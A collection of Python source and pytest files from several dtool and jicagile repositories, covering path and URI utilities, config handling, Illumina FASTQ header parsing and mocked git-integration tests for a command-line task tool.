```python
import os
import errno
import getpass
import hashlib
import json
import platform
import binascii
import base64
import datetime
import re
import socket
import logging
try:
from urlparse import urlparse, urlunparse
except ImportError:
from urllib.parse import urlparse, urlunparse
logger = logging.getLogger(__name__)
IS_WINDOWS = False
if platform.system() == "Windows":
IS_WINDOWS = True
DEFAULT_CONFIG_PATH = os.path.expanduser("~/.config/dtool/dtool.json")
DEFAULT_CACHE_PATH = os.path.expanduser("~/.cache/dtool")
MAX_NAME_LENGTH = 80
NAME_VALID_CHARS_LIST = ["0-9", "a-z", "A-Z", "-", "_", "."]
NAME_VALID_CHARS_STR = "".join(NAME_VALID_CHARS_LIST)
NAME_VALID_CHARS_REGEX = re.compile(r"^[{}]+$".format(NAME_VALID_CHARS_STR))
def windows_to_unix_path(win_path):
"""Return Unix path."""
logger.debug("In windows_to_unix_path...")
logger.debug("windows_to_unix_path.input_win_path: {}".format(win_path))
unix_path = win_path.replace("\\", "/")
# Deal with Windows path defect where path has incorrect starting /, e.g.
# /C:/some/path.
if IS_WINDOWS and len(unix_path) >=2 and unix_path[0] == "/" and unix_path[2] == ":": # NOQA
unix_path = unix_path[1:]
logger.debug("windows_to_unix_path.return: {}".format(unix_path))
return unix_path
def unix_to_windows_path(unix_path):
"""Return Windows path."""
logger.debug("In unix_to_windows_path...")
logger.debug("unix_to_windows_path.input_unix_path: {}".format(unix_path))
# Deal with Windows path defect where path has incorrect starting /, e.g.
# /C:/some/path.
if IS_WINDOWS and len(unix_path) >= 2 and unix_path[0] == "/" and unix_path[2] == ":": # NOQA
unix_path = unix_path[1:]
win_path = unix_path.replace("/", "\\")
logger.debug("unix_to_windows_path.return: {}".format(win_path))
return win_path
def generous_parse_uri(uri):
"""Return a urlparse.ParseResult object with the results of parsing the
given URI. This has the same properties as the result of parse_uri.
When passed a relative path, it determines the absolute path, sets the
scheme to file, the netloc to localhost and returns a parse of the result.
"""
logger.debug("In generous_pase_uri...")
logger.debug("generous_pase_uri.input_uri: {}".format(uri))
parse_result = urlparse(uri)
IS_WINDOWS_DRIVE_LETTER = len(parse_result.scheme) == 1
if parse_result.scheme == '' or IS_WINDOWS_DRIVE_LETTER:
abspath = os.path.abspath(parse_result.path)
fixed_uri = "file://{}{}".format(
socket.gethostname(),
abspath
)
if IS_WINDOWS:
abspath = windows_to_unix_path(abspath)
if IS_WINDOWS_DRIVE_LETTER:
abspath = parse_result.scheme.upper() + abspath[1:]
fixed_uri = "file:///{}".format(abspath)
parse_result = urlparse(fixed_uri)
logger.debug("generouse_pase_uri.return: {}".format(parse_result))
return parse_result
def sanitise_uri(uri):
"""Return fully qualified uri from the input, which might be a relpath."""
logger.debug("In sanitise_uri...")
logger.debug("sanitise_uri.input_uri: {}".format(uri))
logger.debug("sanitise_uri.calling.utils.generouse_parse_uri")
uri = urlunparse(generous_parse_uri(uri))
logger.debug("sanitise_uri.return: {}".format(uri))
return uri
def cross_platform_getuser(is_windows, no_username_in_env):
"""Return the username or "unknown".
The function returns "unknown" if the platform is windows
and the username environment variable is not set.
"""
if is_windows and no_username_in_env:
return "unknown"
return getpass.getuser()
def getuser():
"""Return the username."""
is_windows = platform.system() == "Windows"
no_username_in_env = os.environ.get("USERNAME") is None
return cross_platform_getuser(is_windows, no_username_in_env)
def _get_config_dict_from_file(config_path=None):
"""Return value if key exists in file.
Return empty string ("") if key or file does not exist.
"""
if config_path is None:
config_path = DEFAULT_CONFIG_PATH
# Default (empty) content will be used if config file does not exist.
config_content = {}
# If the config file exists we use that content.
if os.path.isfile(config_path):
with open(config_path) as fh:
config_content = json.load(fh)
return config_content
def write_config_value_to_file(key, value, config_path=None):
"""Write key/value pair to config file.
"""
if config_path is None:
config_path = DEFAULT_CONFIG_PATH
# Get existing config.
config = _get_config_dict_from_file(config_path)
# Add/update the key/value pair.
config[key] = value
# Create parent directories if they are missing.
mkdir_parents(os.path.dirname(config_path))
# Write the content
with open(config_path, "w") as fh:
json.dump(config, fh, sort_keys=True, indent=2)
# Set 600 permissions on the config file.
os.chmod(config_path, 33216)
return get_config_value_from_file(key, config_path)
def get_config_value_from_file(key, config_path=None, default=None):
"""Return value if key exists in file.
Return default if key not in config.
"""
config = _get_config_dict_from_file(config_path)
if key not in config:
return default
return config[key]
def get_config_value(key, config_path=None, default=None):
"""Get a configuration value.
Preference:
1. From environment
2. From JSON configuration file supplied in ``config_path`` argument
3. The default supplied to the function
:param key: name of lookup value
:param config_path: path to JSON configuration file
:param default: default fall back value
:returns: value associated with the key
"""
if config_path is None:
config_path = DEFAULT_CONFIG_PATH
# Start by setting default value
value = default
# Update from config file
value = get_config_value_from_file(
key=key,
config_path=config_path,
default=value
)
# Update from environment variable
value = os.environ.get(key, value)
return value
def sha1_hexdigest(input_string):
"""Return hex digest of the sha1sum of the input_string."""
byte_string = input_string.encode()
return hashlib.sha1(byte_string).hexdigest()
def base64_to_hex(input_string):
"""Retun the hex encoded version of the base64 encoded input string."""
return binascii.hexlify(base64.b64decode(input_string)).decode()
def generate_identifier(handle):
"""Return identifier from a ProtoDataSet handle."""
return sha1_hexdigest(handle)
def mkdir_parents(path):
"""Create the given directory path.
This includes all necessary parent directories. Does not raise an error if
the directory already exists.
:param path: path to create
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
def timestamp(datetime_obj):
"""Return Unix timestamp as float.
The number of seconds that have elapsed since January 1, 1970.
"""
start_of_time = datetime.datetime(1970, 1, 1)
diff = datetime_obj - start_of_time
return diff.total_seconds()
def name_is_valid(name):
"""Return True if the dataset name is valid.
The name can only be 80 characters long.
Valid characters: Alpha numeric characters [0-9a-zA-Z]
Valid special characters: - _ .
"""
# The name can only be 80 characters long.
if len(name) > MAX_NAME_LENGTH:
return False
return bool(NAME_VALID_CHARS_REGEX.match(name))
def relpath_to_handle(relpath, is_windows=False):
"""Return handle from relpath.
Handles are Unix style relpaths.
Converts Windows relpath to Unix style relpath.
Strips "./" prefix.
"""
if is_windows:
relpath = windows_to_unix_path(relpath)
if relpath.startswith("./"):
relpath = relpath[2:]
return relpath
def handle_to_osrelpath(handle, is_windows=False):
"""Return OS specific relpath from handle."""
directories = handle.split("/")
if is_windows:
return "\\".join(directories)
return "/".join(directories)
``` |
{
"source": "JIC-CSB/dtool-irods",
"score": 2
} |
#### File: dtool-irods/tests/__init__.py
```python
import os
import shutil
import tempfile
import string
import random
from contextlib import contextmanager
import pytest
from dtoolcore import generate_admin_metadata
from dtool_irods.storagebroker import (
_mkdir,
_rm_if_exists,
IrodsStorageBroker,
)
_HERE = os.path.dirname(__file__)
TEST_SAMPLE_DATA = os.path.join(_HERE, "data")
TEST_ZONE = "/jic_overflow/dtool-testing"
@contextmanager
def tmp_env_var(key, value):
os.environ[key] = value
yield
del os.environ[key]
@contextmanager
def tmp_directory():
d = tempfile.mkdtemp()
yield d
shutil.rmtree(d)
def random_string(
size=9,
chars=string.ascii_uppercase + string.ascii_lowercase + string.digits
):
return ''.join(random.choice(chars) for _ in range(size))
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def tmp_uuid_and_uri(request):
admin_metadata = generate_admin_metadata("test_dataset")
uuid = admin_metadata["uuid"]
base_uri = "irods:" + TEST_ZONE
uri = IrodsStorageBroker.generate_uri("test_dataset", uuid, base_uri)
@request.addfinalizer
def teardown():
_, irods_path = uri.split(":", 1)
_rm_if_exists(irods_path)
return (uuid, uri)
@pytest.fixture
def tmp_irods_base_uri_fixture(request):
collection = os.path.join(TEST_ZONE, random_string())
_mkdir(collection)
@request.addfinalizer
def teardown():
_rm_if_exists(collection)
return "irods:" + collection
```
#### File: dtool-irods/tests/test_IrodsStorageBroker_list_dataset_uris.py
```python
from . import tmp_irods_base_uri_fixture # NOQA
def test_list_dataset_uris(tmp_irods_base_uri_fixture): # NOQA
import dtoolcore
from dtool_irods.storagebroker import IrodsStorageBroker
assert [] == IrodsStorageBroker.list_dataset_uris(
base_uri=tmp_irods_base_uri_fixture,
config_path=None
)
# Create two datasets to be copied.
expected_uris = []
for name in ["test_ds_1", "test_ds_2"]:
admin_metadata = dtoolcore.generate_admin_metadata(name)
proto_dataset = dtoolcore.generate_proto_dataset(
admin_metadata=admin_metadata,
base_uri=tmp_irods_base_uri_fixture
)
proto_dataset.create()
expected_uris.append(proto_dataset.uri)
actual_uris = IrodsStorageBroker.list_dataset_uris(
base_uri=tmp_irods_base_uri_fixture,
config_path=None
)
assert set(expected_uris) == set(actual_uris)
```
#### File: dtool-irods/tests/test_self_description.py
```python
import os
from . import tmp_uuid_and_uri # NOQA
def test_writing_of_dtool_structure_file(tmp_uuid_and_uri): # NOQA
from dtoolcore import ProtoDataSet, generate_admin_metadata
from dtoolcore.utils import generous_parse_uri
from dtool_irods.storagebroker import _path_exists, _get_obj, __version__
# Create a proto dataset.
uuid, dest_uri = tmp_uuid_and_uri
name = "test_dtool_structure_file"
admin_metadata = generate_admin_metadata(name)
admin_metadata["uuid"] = uuid
proto_dataset = ProtoDataSet(
uri=dest_uri,
admin_metadata=admin_metadata,
config_path=None
)
proto_dataset.create()
# Check that the ".dtool/structure.json" file exists.
expected_irods_path = os.path.join(
generous_parse_uri(dest_uri).path,
".dtool",
"structure.json"
)
assert _path_exists(expected_irods_path)
expected_content = {
"data_directory": ["data"],
"dataset_readme_relpath": ["README.yml"],
"dtool_directory": [".dtool"],
"admin_metadata_relpath": [".dtool", "dtool"],
"structure_metadata_relpath": [".dtool", "structure.json"],
"dtool_readme_relpath": [".dtool", "README.txt"],
"manifest_relpath": [".dtool", "manifest.json"],
"overlays_directory": [".dtool", "overlays"],
"annotations_directory": [".dtool", "annotations"],
"tags_directory": [".dtool", "tags"],
"metadata_fragments_directory": [".dtool", "tmp_fragments"],
"storage_broker_version": __version__,
}
actual_content = _get_obj(expected_irods_path)
assert expected_content == actual_content
def test_writing_of_dtool_readme_file(tmp_uuid_and_uri): # NOQA
from dtoolcore import ProtoDataSet, generate_admin_metadata
from dtoolcore.utils import generous_parse_uri
from dtool_irods.storagebroker import _path_exists, _get_text
# Create a proto dataset.
uuid, dest_uri = tmp_uuid_and_uri
name = "test_dtool_readme_file"
admin_metadata = generate_admin_metadata(name)
admin_metadata["uuid"] = uuid
proto_dataset = ProtoDataSet(
uri=dest_uri,
admin_metadata=admin_metadata,
config_path=None
)
proto_dataset.create()
# Check that the ".dtool/README.txt" file exists.
expected_irods_path = os.path.join(
generous_parse_uri(dest_uri).path,
".dtool",
"README.txt"
)
assert _path_exists(expected_irods_path)
actual_content = _get_text(expected_irods_path)
assert actual_content.startswith("README")
``` |
{
"source": "JIC-CSB/dtoolsid",
"score": 3
} |
#### File: dtoolsid/dtoolsid/illumina.py
```python
import os
import gzip
from dtoolsid.utils import is_file_extension_in_list
def parse_fastq_title_line(fastq_title_line):
def illumina_bool(x):
if x == "Y":
return True
if x == "N":
return False
raise(ValueError)
component_names = [
("instrument", str),
("run_number", int),
("flowcell_id", str),
("lane", int),
("tile", int),
("x_pos", int),
("y_pos", int),
("read", int),
("is_filtered", illumina_bool),
("control_number", int),
("index_sequence", str)
]
assert fastq_title_line[0] == '@'
words = fastq_title_line[1:].split(" ")
assert len(words) == 2
components = words[0].split(":") + words[1].split(":")
assert len(components) == len(component_names)
# We were going through a functional phase
return {
name: cast_func(component)
for (name, cast_func), component
in zip(component_names, components)
}
def extract_metadata_from_fastq_file_object(fh):
first_line = fh.readline().strip()
try:
first_line = first_line.decode('utf-8')
except AttributeError:
pass
return parse_fastq_title_line(first_line)
def extract_metadata_from_fastq_file(filename):
try:
with open(filename) as fh:
metadata = extract_metadata_from_fastq_file_object(fh)
except UnicodeDecodeError:
with gzip.open(filename, 'rb') as fh:
metadata = extract_metadata_from_fastq_file_object(fh)
return metadata
def create_illumina_metadata_overlay(dataset):
"""Create overlay derived from Illumina FQ metadata, and write it to
dataset."""
illumina_metadata_overlay = dataset.empty_overlay()
for identifier in dataset.identifiers:
abspath = dataset.abspath_from_identifier(identifier)
if is_file_extension_in_list(abspath, ['fq', 'fq.gz']):
metadata = extract_metadata_from_fastq_file(abspath)
illumina_metadata_overlay[identifier] = metadata
dataset.persist_overlay(
"illumina_metadata",
illumina_metadata_overlay
)
```
#### File: dtoolsid/tests/__init__.py
```python
import os
import shutil
import tempfile
import pytest
import dtoolcore
_HERE = os.path.dirname(__file__)
ILLUMINA_DATASET_PATH = os.path.join(_HERE, 'data', 'illumina_test_data')
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def tmp_illumina_dataset(request):
d = tempfile.mkdtemp()
subd = os.path.join(d, 'sub')
shutil.copytree(ILLUMINA_DATASET_PATH, subd)
@request.addfinalizer
def teatdown():
shutil.rmtree(d)
return dtoolcore.DataSet.from_path(subd)
@pytest.fixture
def tmp_illumina_dataset_directory(request):
d = tempfile.mkdtemp()
subd = os.path.join(d, 'sub')
shutil.copytree(ILLUMINA_DATASET_PATH, subd)
@request.addfinalizer
def teatdown():
shutil.rmtree(d)
return subd
@pytest.fixture
def dataset_fixture(request):
d = tempfile.mkdtemp()
dataset = dtoolcore.DataSet("test", "data")
dataset.persist_to_path(d)
for s in ["hello", "world"]:
fname = s + ".txt"
fpath = os.path.join(d, "data", fname)
with open(fpath, "w") as fh:
fh.write(s)
dataset.update_manifest()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def collection_fixture(request):
collection_path = tempfile.mkdtemp()
collection = dtoolcore.Collection()
collection.persist_to_path(collection_path)
for ds_name in ["rice", "wheat", "barley"]:
ds_path = os.path.join(collection_path, ds_name)
os.mkdir(ds_path)
dataset = dtoolcore.DataSet(ds_name, "data")
dataset.persist_to_path(ds_path)
for s in ["sow", "grow", "harvest"]:
fname = s + ".txt"
fpath = os.path.join(ds_path, "data", fname)
with open(fpath, "w") as fh:
fh.write("{} {}\n".format(s, ds_name))
dataset.update_manifest()
@request.addfinalizer
def teardown():
shutil.rmtree(collection_path)
return collection_path
```
#### File: dtoolsid/tests/test_illumina.py
```python
from . import tmp_illumina_dataset # NOQA
def test_tmp_dataset_fixture(tmp_illumina_dataset): # NOQA
assert len(tmp_illumina_dataset.identifiers) == 4
def check_fastq_read_1_sample_result(result):
assert result["instrument"] == "ST-E00317"
assert result["run_number"] == 319
assert result["flowcell_id"] == "HJMGJALXX"
assert result["lane"] == 2
assert result["tile"] == 1101
assert result["x_pos"] == 7750
assert result["y_pos"] == 1309
assert result["read"] == 1
assert result["is_filtered"] is False
assert result["control_number"] == 0
assert result["index_sequence"] == "NGTCACTA"
def test_parse_fastq_title_line():
sample_title_line = \
"@ST-E00317:319:HJMGJALXX:2:1101:7750:1309 1:N:0:NGTCACTA"
from dtoolsid.illumina import parse_fastq_title_line
result = parse_fastq_title_line(sample_title_line)
check_fastq_read_1_sample_result(result)
def test_parse_fastq_title_line_sample_num_edge_case():
from dtoolsid.illumina import parse_fastq_title_line
sample_title_line = \
"@ST-E00317:319:HJMGJALXX:2:1101:7750:1309 1:N:0:NGTCACTA"
result = parse_fastq_title_line(sample_title_line)
assert result["index_sequence"] == "NGTCACTA"
sample_title_line = \
"@ST-E00317:319:HJMGJALXX:2:1101:7750:1309 1:N:0:2"
result = parse_fastq_title_line(sample_title_line)
assert result["index_sequence"] == "2"
def test_extract_metadata_from_fastq_file_object(tmp_illumina_dataset): # NOQA
from dtoolsid.illumina import extract_metadata_from_fastq_file_object
fastq_file_identifier = "42889f278935f206dcf2772c81a055b338844c48"
fastq_filename = tmp_illumina_dataset.abspath_from_identifier(
fastq_file_identifier
)
with open(fastq_filename) as fh:
result = extract_metadata_from_fastq_file_object(fh)
check_fastq_read_1_sample_result(result)
def test_extract_metadata_from_fastq_file(tmp_illumina_dataset): # NOQA
from dtoolsid.illumina import extract_metadata_from_fastq_file
# Test plaintext fastq file
fastq_file_identifier = "42889f278935f206dcf2772c81a055b338844c48"
fastq_filename = tmp_illumina_dataset.abspath_from_identifier(
fastq_file_identifier
)
result = extract_metadata_from_fastq_file(fastq_filename)
check_fastq_read_1_sample_result(result)
# Test a gzipped fastq file
fastq_gz_file_identifier = "40ed0c9553797c66cfa07cefb37af9086a5da66b"
fastq_gz_filename = tmp_illumina_dataset.abspath_from_identifier(
fastq_gz_file_identifier
)
result = extract_metadata_from_fastq_file(fastq_gz_filename)
check_fastq_read_1_sample_result(result)
def test_create_illumina_metadata_overlay(tmp_illumina_dataset): # NOQA
from dtoolsid.illumina import create_illumina_metadata_overlay
create_illumina_metadata_overlay(tmp_illumina_dataset)
overlays = tmp_illumina_dataset.access_overlays()
assert "illumina_metadata" in overlays
first_identifier = "42889f278935f206dcf2772c81a055b338844c48"
first_metadata = overlays["illumina_metadata"][first_identifier]
check_fastq_read_1_sample_result(first_metadata)
first_gz_identifier = "40ed0c9553797c66cfa07cefb37af9086a5da66b"
first_gz_metadata = overlays["illumina_metadata"][first_gz_identifier]
check_fastq_read_1_sample_result(first_gz_metadata)
``` |
{
"source": "JIC-CSB/dtoolutils",
"score": 2
} |
#### File: dtoolutils/tests/__init__.py
```python
import os
import shutil
import tempfile
import pytest
_HERE = os.path.dirname(__file__)
TEST_SAMPLE_DATASET = os.path.join(_HERE, "data", "sample_data")
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def tmp_dataset_fixture(request):
from dtoolcore import DataSet
d = tempfile.mkdtemp()
dataset_path = os.path.join(d, 'sample_data')
shutil.copytree(TEST_SAMPLE_DATASET, dataset_path)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return DataSet.from_path(dataset_path)
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
``` |
{
"source": "JIC-CSB/jicagile",
"score": 2
} |
#### File: jicagile/tests/git_integration_tests.py
```python
import unittest
import os
import os.path
import shutil
from subprocess import Popen, PIPE
import tempfile
import mock
CUR_DIR = os.getcwd()
class GitIntegrationTests(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
if not os.path.isdir(self.tmp_dir):
os.mkdir(self.tmp_dir)
os.chdir(self.tmp_dir)
def tearDown(self):
os.chdir(CUR_DIR)
shutil.rmtree(self.tmp_dir)
def test_edit_without_git(self):
import jicagile
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["add", "Basic task", "1"])
cli.run(args)
backlog_dir = os.path.join(self.tmp_dir, "backlog")
task_fpath = os.path.join(backlog_dir, "basic-task.yml")
team = jicagile.config.Team()
team.add_member("TO", "Tjelvar", "Olsson")
team.add_member("MH", "Matthew", "Hartley")
cli.project.team = team
themes = jicagile.config.Themes()
themes.add_member("admin", "grants, appraisals, etc")
cli.project.themes = themes
args = cli.parse_args(["edit",
task_fpath,
"-s", "3",
"-p", "TO",
"-e", "admin"])
cli.run(args)
task_from_file = jicagile.Task.from_file(task_fpath)
self.assertEqual(task_from_file["title"], "Basic task")
self.assertEqual(task_from_file["storypoints"], 3)
self.assertEqual(task_from_file["primary_contact"], "TO")
self.assertEqual(task_from_file["theme"], "admin")
@mock.patch('subprocess.Popen')
def test_edit_with_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
import jicagile
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["add", "Basic task", "1"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = False # We are not testing integration here.
cli.run(args)
backlog_dir = os.path.join(self.tmp_dir, "backlog")
task_fpath = os.path.join(backlog_dir, "basic-task.yml")
args = cli.parse_args(["edit", task_fpath, "-s", "3"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = True # We are testing integration here.
cli.run(args)
patch_popen.assert_called_with(["git", "add", task_fpath])
def test_edit_title_without_git(self):
import jicagile
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["add", "Basic task", "1"])
cli.run(args)
backlog_dir = os.path.join(self.tmp_dir, "backlog")
org_task_fpath = os.path.join(backlog_dir, "basic-task.yml")
new_task_fpath = os.path.join(backlog_dir, "complicated-task.yml")
self.assertTrue(os.path.isfile(org_task_fpath))
self.assertFalse(os.path.isfile(new_task_fpath))
args = cli.parse_args(["edit",
org_task_fpath,
"-t", "Complicated task"])
cli.run(args)
self.assertFalse(os.path.isfile(org_task_fpath))
self.assertTrue(os.path.isfile(new_task_fpath))
task_from_file = jicagile.Task.from_file(new_task_fpath)
self.assertEqual(task_from_file["title"], "Complicated task")
@mock.patch('subprocess.Popen')
def test_edit_title_with_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
import jicagile
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["add", "Basic task", "1"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = False # Just creating a task to work with not testing git integration.
cli.run(args)
backlog_dir = os.path.join(self.tmp_dir, "backlog")
org_task_fpath = os.path.join(backlog_dir, "basic-task.yml")
new_task_fpath = os.path.join(backlog_dir, "complicated-task.yml")
self.assertTrue(os.path.isfile(org_task_fpath))
self.assertFalse(os.path.isfile(new_task_fpath))
args = cli.parse_args(["edit",
org_task_fpath,
"-t", "Complicated task"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = True # This is where we test git integration.
cli.run(args)
calls = [mock.call(["git", "add", org_task_fpath]),
mock.call(["git", "mv", org_task_fpath, new_task_fpath])]
self.assertEqual(patch_popen.call_args_list, calls)
def test_is_git_repo(self):
from jicagile.cli import CLI
cli = CLI()
self.assertFalse(cli.is_git_repo)
process = Popen(["git", "init"], stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
self.assertTrue(cli.is_git_repo)
@mock.patch('subprocess.Popen')
def test_add_without_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["add", "Simple task", "1"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = False
cli.run(args)
patch_popen.assert_not_called()
@mock.patch('subprocess.Popen')
def test_add_with_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["add", "Simple task", "1"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = True
cli.run(args)
fpath = os.path.join(".", "backlog", "simple-task.yml")
patch_popen.assert_called_with(["git", "add", fpath])
@mock.patch('subprocess.Popen')
def test_mv_without_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["mv", "path/to/move", "/dest/"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = False
cli.run(args)
patch_popen.assert_called_with(["mv", "path/to/move", "/dest/"])
@mock.patch('subprocess.Popen')
def test_mv_with_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["mv", "path/to/move", "/dest/"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = True
cli.run(args)
patch_popen.assert_called_with(["git", "mv", "path/to/move", "/dest/"])
@mock.patch('subprocess.Popen')
def test_theme_without_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["theme", "add", "admin", "stuff to do"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = False
cli.run(args)
patch_popen.assert_not_called()
@mock.patch('subprocess.Popen')
def test_theme_with_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["theme", "add", "admin", "stuff to do"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = True
cli.run(args)
fpath = os.path.join(".", ".themes.yml")
patch_popen.assert_called_with(["git", "add", fpath])
@mock.patch('subprocess.Popen')
def test_teammember_without_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["teammember", "add", "TO", "Tjelvar", "Olsson"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = False
cli.run(args)
patch_popen.assert_not_called()
@mock.patch('subprocess.Popen')
def test_teammember_with_git(self, patch_popen):
process_mock = mock.MagicMock()
attrs = {"communicate.return_value": None}
process_mock.configure(**attrs)
patch_popen.return_value = process_mock
from jicagile.cli import CLI
cli = CLI()
args = cli.parse_args(["teammember", "add", "TO", "Tjelvar", "Olsson"])
with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
mock_is_git_repo.return_value = True
cli.run(args)
fpath = os.path.join(".", ".team.yml")
patch_popen.assert_called_with(["git", "add", fpath])
```
#### File: jicagile/tests/Theme_unit_tests.py
```python
import unittest
class ThemeUnitTests(unittest.TestCase):
def test_initialisation(self):
import jicagile.config
themes = jicagile.config.Themes()
self.assertEqual(len(themes), 0)
def test_theme_member_initialisation(self):
import jicagile.config
theme = jicagile.config.Themes.Member("img", "bioimage analysis")
self.assertEqual(theme.lookup, "img")
self.assertEqual(theme.description, "bioimage analysis")
def test_add_member_to_themes(self):
import jicagile
themes = jicagile.config.Themes()
themes.add_member(lookup="img", description="bioimage analysis")
self.assertEqual(len(themes), 1)
self.assertTrue(isinstance(themes.member("img"), jicagile.config.Themes.Member))
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.